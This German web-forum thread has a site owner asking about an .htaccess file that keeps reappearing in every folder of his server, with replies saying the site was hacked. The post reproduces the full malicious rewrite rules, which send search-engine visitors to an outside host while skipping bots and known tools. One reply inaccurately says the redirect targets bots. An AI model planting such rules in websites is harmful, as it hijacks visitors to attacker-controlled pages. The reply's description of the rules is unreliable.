Komische .htaccess auf meinem Server
Ron
- webserver
1 Sven Rautenberg0 Tom
Hallo Leute,
ich habe in allen Ordnern auf meinem FTP Server solch eine Datei (siehe unten). was kann das sein?. Wenn ich die Datei lösche, ist sie später
wieder da.
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http://)?([^/?]*.)?(google.|yahoo.|bing.|msn.|yandex.|ask.|excite.|altavista.|netscape.|aol.|hotbot.|goto.|infoseek.|mamma.|alltheweb.|lycos.|search.|metacrawler.|rambler.|mail.|dogpile.|ya.|/search?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q=cache:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda-Search|HP-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os=Mac|P900i|panscient|perl|PlayStation|POE-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://checkforsec.com/cgi-bin/r.cgi?p=&i=7d6d7979&j=106&m=8a25005a043137ea995ce6cd37a93be5&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
Moin!
ich habe in allen Ordnern auf meinem FTP Server solch eine Datei (siehe unten). was kann das sein?. Wenn ich die Datei lösche, ist sie später
wieder da.
Da redirected jemand Zugriffe auf deinen Webspace dann auf eine fremde URL, wenn ein Bot erkannt wird.
Sowas ist nicht normal. Jemand hat deinen Webspace gehackt. Irgendwo hat sich ein Skript eingeschlichen, was diese .htaccess erzeugt.
Finde die Sicherheitslücke und beseitige sie.
- Sven Rautenberg
Hello,
vielleicht ist auch dieser Thread für Dich interessant?
https://forum.selfhtml.org/?t=196360&m=1315458
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg